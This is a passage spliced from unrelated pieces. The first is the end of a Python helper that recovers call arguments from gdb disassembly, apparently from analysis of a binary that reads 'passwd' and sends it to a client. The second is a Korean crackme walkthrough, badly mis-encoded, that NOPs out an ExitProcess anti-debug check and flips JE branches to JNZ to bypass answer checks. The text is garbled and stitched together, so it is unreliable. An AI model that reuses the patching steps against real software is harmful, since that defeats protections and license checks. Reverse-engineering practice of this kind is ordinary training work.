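CALL_RE = re.compile(r'^0x[0-9a-f]+\s+<([^>]+)>$')


def parse_gdb_lines(text):
    """Yield (address, symbol+offset, mnemonic, operands) per instruction line."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m.group(1), m.group(2), m.group(3), m.group(4).strip()


def describe_push(operand):
    """Immediates become ints; registers and memory operands stay as text."""
    if operand.startswith('$'):
        return int(operand[1:], 16)
    return operand


def extract_calls(text):
    """Return [(callee, [arg1, arg2, ...])]: pushes since the previous call,
    reversed, since the last value pushed is the first cdecl argument."""
    pushed, calls = [], []
    for _addr, _sym, mnem, ops in parse_gdb_lines(text):
        if mnem in ('push', 'pushl'):
            pushed.append(describe_push(ops))
        elif mnem == 'call':
            m = CALL_RE.match(ops)
            callee = m.group(1) if m else ops
            calls.append((callee, list(reversed(pushed))))
            pushed = []
    return calls


if __name__ == '__main__':
    for callee, args in extract_calls(GDB_DUMP):
        print(f"{callee}({', '.join(hex(a) if isinstance(a, int) else a for a in args)})")
```

Immediates that are really pointers (0x80491e4, 0x80491e2) still need an `x/s` in gdb, as the report did, to become "passwd" and "r". The recovered send(client, buffer, 0x1f4, 0) also makes the fixed 500-byte length visible at a glance, which the report's sprintf/send reconstruction shows as well.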





 )

result.exe ollydbg мϷ   run ϴ α׷ ˴ϴ.
Ƹ ο   ƾ ִ° ϴ.
̺κ    ֱ   ѱ  ־ϴ.
ó breakpoint ɰ    ϴ.

004015C3 |. E8 F83B0000 CALL result.004051C0  бⰡ   ˴ϴ.
call   ٽ  ̴ϴ.(    )

004051CB |. E8 70000000 CALL result.00405240 ; \result.00405240
⼭ ٽ б   մϴ.

00405240 ּҷ     õõ 캸  ؿ ExitProccess ֽϴ.
 üũ   üũ  ExitProccess ̿Ͽ ŵϴ.
 κ NOP ä ġմϴ.
̷μ   ƾ ȭ ų  ֽϴ.

α׷ 캸 Ʈ ؾ ϴ  ϴ.
Ʈ  ʰ Ǯڽϴ.

0040BC79 74 1C JE SHORT resultx.0040BC97 
0040BC7B |. 68 78004200 PUSH resultx.00420078 ; /Arg2 = 00420078 ASCII "sorry : This problem is not solved. Try again :( " 

̺κ   üũ ̷  ڿ ġ  ϴ° Դϴ.
б JNZ   Ѿϴ.

0040BCDD 74 1C JE SHORT resultx.0040BCFB
0040BCDF |. 68 78004200 PUSH resultx.00420078 ; /Arg2 = 00420078 ASCII "sorry : This problem is not solved. Try again :( "

Ʊ  Դϴ.
JNZ   Ѿϴ.

̷ üũ ǽɵǴ κ б    Ű    ֽϴ.
, C*dafd*hcdcyb*0#